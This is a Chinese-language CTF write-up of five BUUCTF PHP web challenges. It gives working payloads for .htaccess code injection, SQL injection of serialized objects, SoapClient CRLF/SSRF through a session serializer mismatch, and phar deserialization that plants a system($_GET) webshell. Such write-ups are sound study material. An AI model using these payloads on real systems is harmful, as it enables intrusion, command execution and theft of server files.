BUUCTF刷题十一道(11)

文章目录

  • [羊城杯2020]easyphp
  • [安洵杯 2019]不是文件上传
  • bestphp's revenge
  • [SUCTF 2018]annonymous
  • [GXYCTF2019]BabysqliV3.0

打开BUU排行榜仰望各位大佬,想来我所谓的努力还是微不足道

[羊城杯2020]easyphp


<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {//检测如果不是index.php就删掉
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {//检测是否设置了content和filename
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {//检测上传的文件是不是以字母加点开头的
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {//再次检测当前文件夹,删除非index.php的文件
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");//在写入内容最后加上\nHello World
?>

上传.htaccess文件,设置auto_prepend_file包含.htaccess文件进行代码执行


php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fl??');?>\

测试发现使用append_file没有效果
file用反斜杠进行换行分割,看别人的博客发现应该是.htaccess文件的特性

井号在.htaccess文件中是注释符的意思,当.htaccess文件被自动包含到index.php时,是以文本形式进行包含的,所以井号没有起到注释符的意思,直到匹配到<?php时才认为是代码开始


# 1.php
<?php
include("1.txt")
?>

1.txt

#<?php phpinfo?>

在这里插入图片描述

而最终的转义符,是要将\n的转义符进行转义,使得换行符失效,否则.htaccess文件会变成


php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fl??');?>
Hello World


不符合其语法

payload:

?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fl??')%3B%3F%3E%5C

[安洵杯 2019]不是文件上传

[安洵杯 2019]不是文件上传


<?php
class helper {
	protected $folder = "pic/";   //图片文件夹
	protected $ifview = False; 
	protected $config = "config.txt"; 
	// The function is not yet perfect, it is not open yet.

	public function upload($input="file")
	{
		$fileinfo = $this->getfile($input);   //获取上传文件
		$array = array();
		$array["title"] = $fileinfo['title'];	//title
		$array["filename"] = $fileinfo['filename'];		//filename
		$array["ext"] = $fileinfo['ext'];		//后缀
		$array["path"] = $fileinfo['path'];		//路径
		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);	
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);
		if ($id == 0){
			die("Something wrong!");
		}
		echo "<br>";
		echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
	}

	public function getfile($input)
	{
		if(isset($input)){
			$rs = $this->check($_FILES[$input]);  //过滤
		}
		return $rs;
	}

	public function check($info)
	{
		$basename = substr(md5(time().uniqid()),9,16);  //随机名
		$filename = $info["name"];			
		$ext = substr(strrchr($filename, '.'), 1);
		$cate_exts = array("jpg","gif","png","jpeg");
		if(!in_array($ext,$cate_exts)){
			die("<p>Please upload the correct image file!!!</p>");
		}
	    $title = str_replace(".".$ext,'',$filename);
	    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
	}//检测文件后缀类型并赋予随机名

	public function save($data)
	{
		if(!$data || !is_array($data)){
			die("Something wrong!");
		}
		$id = $this->insert_array($data);
		return $id;
	}

	public function insert_array($data)
	{	
		$con = mysqli_connect("127.0.0.1","root","root","pic_base");
		if (mysqli_connect_errno($con)) 
		{ 
		    die("Connect MySQL Fail:".mysqli_connect_error());
		}
		$sql_fields = array();
		$sql_val = array();
		foreach($data as $key=>$value){
			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);		
			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
			$sql_fields[] = "`".$key_temp."`";
			$sql_val[] = "'".$value_temp."'";
		}
		$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
		mysqli_query($con, $sql);
		$id = mysqli_insert_id($con);
		mysqli_close($con);
		return $id;
	}

	public function view_files($path){
		if ($this->ifview == False){//ifview要为true
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path); //获取指定$path文件内容进行输出
		echo $content;
	}

	function __destruct(){
		# Read some config html
		$this->view_files($this->config);  //对象调用结束会调用view_file获取config文件内容
	}
}

?>

show.php关键代码



<?php

class show{
	public $con;

	public function Get_All_Images(){
		$sql = "SELECT * FROM images";
		$result = mysqli_query($this->con, $sql);
		if ($result->num_rows > 0){
		    while($row = $result->fetch_assoc()){
		    	if($row["attr"]){
		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
					$attr = unserialize($attr_temp);//最终会对$attr进行反序列化
				}
		        echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
		    }
		}else{
		    echo "<p>You have not uploaded an image yet.</p>";
		}
		mysqli_close($this->con);
	}
?>

最终payload


<?php
class helper {
    protected $ifview = True; 
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
?>

O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
经过check处理后,protected属性成员不可见字符会替换为\0,所以我们也进行相应替换
O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

sql语句上传内容为


INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) VALUES('value','value.jpg','jpg','pic/value.jpg','序列化')

payload触发顺序就是

  1. 通过show.php,获取images表中的所有数据条目
  2. 然后对每个条目中的attr进行反序列化处理,
  3. 如果attr是一个helper类,进行反序列化对象销毁的时候就会调用view_file()将config文件内容进行输出

所以我们上传文件的时候随意将前面这几个字段进行闭合拼接构造,上传文件名中不能有双引号,所以进行16进制编码

filename="1','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('1.jpg"

在这里插入图片描述
访问show.php
在这里插入图片描述

bestphp’s revenge

看大佬写的博客

PHP 原生类的利用小结
bestphp‘s revenge/ 安洵杯Babyphp(phpsession题目)

  • CRLF注入

当请求报文中有请求字段用户可控时,可以注入\r\n回车换行,服务器解析请求时匹配到回车换行就将剩余内容当作请求体进行处理

  • 利用Soap类进行SSRF

<?php
$target = "http://127.0.0.1/flag.php";
$options=array('location' => $target,
'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
'uri' => "123");
$attack = new SoapClient(null,$options);
$payload = urlencode(serialize($attack));
echo $payload;

Soap中有__call()魔术方法,调用其中不存在的函数,会自动向$options指定的URL发起http请求

  • php session 反序列化

存储session内容的时候PHP有三个处理器

  1. php处理器
  2. php_serialize处理器
  3. php_binary处理器

经处理后的session文件存储内容分别如下

当 session.serialize_handler=php 时,session文件内容为: session|s:9:"haoxiaozi";

当 session.serialize_handler=php_serialize 时,session文件为: a:1:{s:7:"session";s:9:"haoxiaozi";}

当 session.serialize_handler=php_binary 时,session文件内容为: 二进制字符sessions:9:"haoxiaozi";


当存储session的脚本和获取session脚本使用处理器不相同时就可能导致反序列化漏洞的产生

如果使用php_serialize处理器进行存储|a:1:{s:7:"session";s:9:"haoxiaozi";},到session文件中内容为
a:1:{s:7:"session";s:44:"|O:7:"XianZhi":1:{s:4:"name";s:7:"xianzhi";}";}

那么用php处理器进行处理时,|会被当做分隔符,前面的内容为键值,后面的内容为


<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

implode,将一个一维数组转换为字符串

reset,指针重新指向数组开头

目录扫描到flag.php


only localhost can get flag!
session_start(); 
echo 'only localhost can get flag!'; 
$flag = 'LCTF{*************************}'; 
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1")
{ $_SESSION['flag'] = $flag; } 
only localhost can get flag!

要求127.0.0.1的请求才能获取flag,利用SSRF进行获取

  1. 先构造soap请求本地flag文件的session序列化内容,序列化处理器改成php_serialize
    
    $target = 'http://127.0.0.1/flag.php';
    $b = new SoapClient(null, array('location' => $target,
        'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",// r n 也就是空行回车
        'uri' => "http://127.0.0.1/"));
     
    $se = serialize($b);
    echo "|" . urlencode($se);
    
    // 原文链接:https://blog.csdn.net/qq_62046696/article/details/128110981
    

GET:f=session_startPOST:serialize_handler=php_serialize name=|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A31%3A%22npfs%0D%0ACookie%3APHPSESSID%3D123456%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D
可以看到session正常的以serialize的形式存入
在这里插入图片描述

  1. 将解析处理器换为php,也就是默认处理器,利用call_user_func,传入extract进行变量覆盖,将b替换为call_user_func
  2. 传入name=SoapClient,后面调用的就是call_user_func('call_user_func','array('SoapClient', 'welcome_to_the_lctf2018')')
  3. 也就是调用SoapClient类不存在的welcome_to_the_lctf2018方法
    在这里插入图片描述
    可以看到session数据第一个已经变为我们想要的SoapClient请求数据
    改Cookie中PHPSESSID为123456,再次请求
    在这里插入图片描述

【为什么需要sessid设置为payload中的才能获取flag内容】

[SUCTF 2018]annonymous

BUUCTF:[SUCTF 2018]annonymous

creat_function(string $args,string $code),创建一个匿名函数,每次创建都会生成%00lambda_%d
在这里插入图片描述

%d是持续递增的,这里的%d会一直递增到最大长度直到结束,通过大量的请求来迫使Pre-fork模式启动
Apache启动新的线程,这样这里的%d会刷新为1,就可以预测了


import requests
while True:
    r=requests.get('http://a10002f2-2091-47dc-9b7c-996d05cd4faa.node3.buuoj.cn/?func_name=%00lambda_1')
    if 'flag' in r.text:
        print(r.text)
        break
    print('Testing.......')


BUU对爆破线程有要求,直接重启一个题目环境,进题目环境的时候就直接带上?func_name=%00lambda_1

因为程序执行的时候匿名函数计数都是从%00lambda_1开始的

查看源码
在这里插入图片描述
或者访问%00lambda_10,效果相同

[GXYCTF2019]BabysqliV3.0

弱口令admin/password进行登录
在这里插入图片描述
注意到url栏有文件包含,尝试访问其他页面发现有关键词过滤
用伪协议读取upoload.php源码

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 

<form action="" method="post" enctype="multipart/form-data">
	上传文件
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){//检测name参数
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;//新建随机文件名+.txt后缀
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>


phar反序列化,上传包含1.php的1.zip文件,传入name参数进行文件包含


 
<?php
 
 
class Uploader{
		public $Filename = 'aaa';
		//public $cmd ='echo phpinfo();';//可先用此测试
		public $cmd ='echo system($_GET["hack"]);';//传递一个可控hack参数
		public $token ='GXY4de07d94caf018e1453439fff2b2375b';//先上串一个合法文件得到session['user']
		
}
 
@unlink("demo.phar");
$phar = new Phar("demo.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF8a<?php __HALT_COMPILER();?>");
$o    = new Uploader();
$phar -> setMetadata($o);//将自定义的meta-data存入manifest
$phar -> addFromString("text.txt","test");//添加要压缩的文件
//签名自动计算
$phar -> stopBuffering();
 
?>

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/492429.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

LNMP架构之mysql数据库实战

mysql安装 到官网www.mysql.com下载源码版本 实验室使用5.7.40版本 tar xf mysql-boost-5.7.40.tar.gz #解压 cd mysql-boost-5.7.40/ yum install -y cmake gcc-c bison #安装依赖性 cmake -DCMAKE_INSTALL_PREFIX/usr/local/mysql -DMYSQL_DATADIR/data/mysql -DMYSQL_…

【力扣刷题日记】1083.销售分析II

前言 练习sql语句&#xff0c;所有题目来自于力扣&#xff08;https://leetcode.cn/problemset/database/&#xff09;的免费数据库练习题。 今日题目&#xff1a; 1083.销售分析II 表&#xff1a;Product 列名类型product_idintproduct_namevarcharunit_priceint Product…

BRICK POP展示了有趣的链上游戏玩法与奖励机制

新游戏BRICK POP将Sui区块链技术与低Gas费用&#xff0c;以及其在Web3游戏开发方面的专业知识无缝结合。通过充分利用Sui和ONBUFF的INNO平台优势&#xff0c;BRICK POP为玩家提供了一个融合了前沿技术和引人入胜游戏的沉浸式游戏体验。BRICK POP游戏设计为实时交易和高用户参与…

迅雷拉新申请入口,官方如何对接?

星子助推迅雷网盘拉新一个多少钱&#xff1f;迅雷拉新推广5块钱的那个怎么做申请&#xff1f; 1、迅雷网盘拉新一个5元左右40%会员佣金&#xff0c;一天净几百上千&#xff0c;团队能做到几十万。 2、通过 星子助推这样的一级代理机构来对接申请&#xff0c;邀请码8x25k 星子助…

It takes two (搜索)

本题链接&#xff1a;登录—专业IT笔试面试备考平台_牛客网 题目&#xff1a; 样例&#xff1a; 输入 3 4 AAAO AAAA AAAA 输出 NO 思路&#xff1a; 根据题目意思&#xff0c;如果存在的 A 联通不可以成为 矩形&#xff0c;输出 NO&#xff0c;否则输出 YES 这道题看数据范…

惠海 H6218L 降压芯片 支持宽压24V30V36V48V60V72V120V输入,转3.3V5V12V4A 大电流

降压芯片&#xff08;也称为DC-DC转换器或电压调节器&#xff09;是一种电子设备&#xff0c;用于将较高的输入电压降低到所需的输出电压。根据您提供的信息&#xff0c;这种降压芯片支持多种宽范围输入电压&#xff0c;包括24V、30V、36V、48V、60V、72V和120V&#xff0c;并能…

perf出现SIGBUS的coredump

coredump信息 (gdb) bt full #0 0x000055c37fa62c00 in perf_evsel__parse_sample (evsel0x55c381223b00, event0x7f144843ab30, data0x7ffcbbcf6540) at util/evsel.c:1939 type <optimized out> swapped <optimized out> array <optimized out> ma…

数字化转型核心:实现业务与技术深度融合的运维数字化管理之道

写在前面 数字化转型已经成为大势所趋&#xff0c;各行各业正朝着数字化方向转型&#xff0c;利用数字化转型方法论和前沿科学技术实现降本、提质、增效&#xff0c;从而提升竞争力。 数字化转型是一项长期工作&#xff0c;包含的要素非常丰富&#xff0c;如数字化转型顶层设…

工时表软件:提高工时审批效率,从消除手动操作开始

在记录员工的工作时间以及他们在工作时间内投入的劳动量方面&#xff0c;工时表确实发挥着重要作用。 不过&#xff0c;越来越多的企业发现手动工时表审批的局限性。手动审批往往需要领导或管理人员投入大量时间和精力&#xff0c;容易出错&#xff0c;并且缺乏明确的跟踪记录…

Java 学习和实践笔记(48):怎样用二维数组来存储表格数据?

怎样用数组的方式&#xff0c;来存储下面这个表格的数据&#xff1f; 示例代码如下&#xff1a; import java.util.Arrays;public class Test001 {public static void main(String[] args) {/*object类对象是类层次结构的根。每个类都有Object作为超类。所有对象&#xff0c;包…

财务收支系统怎么做,财务收支记账软件管理系统教程

财务收支系统怎么做&#xff0c;财务收支记账软件管理系统教程 一、前言 以下软件操作教程以 佳易王财务收支记账软件V17.0为例说明 件文件下载可以点击最下方官网卡片——软件下载——试用版软件下载 财务收支记账管理系统软件可按需定制 1、权限设置&#xff1a;管理员账…

被指华而不实的小罐茶:为广告营销豪掷亿元,谁来为其“买单”?

“酒壮英雄胆,茶引文人思”&#xff0c;茶与酒作为中国传统文化的代表,不仅承载着深厚的历史文化底蕴&#xff0c;也以其普遍性和共通性&#xff0c;逐渐成为现代生活中不可或缺的沟通媒介&#xff0c;被赋予独特的文化内涵与社交属性。 但不同于酒类本身具备的收藏价值&#…

QT_day4:对话框

1、完善对话框&#xff0c;点击登录对话框&#xff0c;如果账号和密码匹配&#xff0c;则弹出信息对话框&#xff0c;给出提示”登录成功“&#xff0c;提供一个Ok按钮&#xff0c;用户点击Ok后&#xff0c;关闭登录界面&#xff0c;跳转到其他界面 如果账号和密码不匹配&…

MATLAB:微分方程(组)数值解

一、显式微分方程 clc,clear tspan [0:10]; y0 2; [t1,y1] ode23(odefun_1,tspan,y0); %求数值解&#xff0c;精度相对低 [t2,y2] ode113(odefun_1,tspan,y0); %求数值解&#xff0c;精度相对高 yt sqrt(tspan1)1; %求精确解 subplot(1,2,1) plot(t1,y1,bo,t2,y2,r*,tspa…

Python学习:函数

函数定义 在Python中&#xff0c;函数&#xff08;Function&#xff09;是一组用于完成特定任务或计算的语句块。定义函数可以让我们将一段代码重用多次&#xff0c;提高代码的可读性和可维护性。以下是定义函数的基本语法和结构&#xff1a; def function_name(parameters):&…

Web3:探索区块链与物联网的融合

引言 随着科技的不断发展&#xff0c;区块链技术和物联网技术都成为了近年来备受瞩目的前沿技术。而当这两者结合在一起&#xff0c;将产生怎样的化学反应呢&#xff1f;本文将深入探讨Web3时代中区块链与物联网的融合&#xff0c;探索其意义、应用场景以及未来发展趋势。 1. …

操作系统原理-模拟动态分区首次适应分配和回收算法——沐雨先生

一、实验题目&#xff1a; 模拟动态分区首次适应分配和回收算法 二、实验目的&#xff1a; 通过本实验&#xff0c;可加深理解动态分区分配、回收程序的功能和具体实现&#xff0c;特别是对回收分区的合并的理解。 三、实验环境&#xff1a; 1、硬件&#xff1a;PC机及其兼容…

『Apisix安全篇』探索Apache APISIX身份认证插件:从基础到实战

&#x1f4e3;读完这篇文章里你能收获到 &#x1f6e0;️ 了解APISIX身份认证的重要性和基本概念&#xff0c;以及如何在微服务架构中实施API安全。&#x1f511; 学习如何使用APISIX的Key Authentication插件进行API密钥管理&#xff0c;包括创建消费者和路由。&#x1f504;…

Python 全栈体系【四阶】(十九)

第五章 深度学习 一、基本理论 4. 神经网络的改进 4.3 循环神经网络 4.3.1 标准 CNN 模型的不足 假设数据之间是独立的。标准 CNN 假设数据之间是独立的&#xff0c;所以在处理前后依赖、序列问题&#xff08;如语音、文本、视频&#xff09;时就显得力不从心。这一类数据…

Eigen之norm函数

向量的范数是一个将向量映射到非负实数的函数,通常表示为 ||x||。它是向量空间中的一种度量,用来衡量向量的大小或长度。范数满足以下性质: 非负性:对于任意向量 x,范数 ||x|| 大于等于零,且当且仅当 x 是零向量时等于零。齐次性:对于任意标量 α,范数 ||αx|| 等于 α…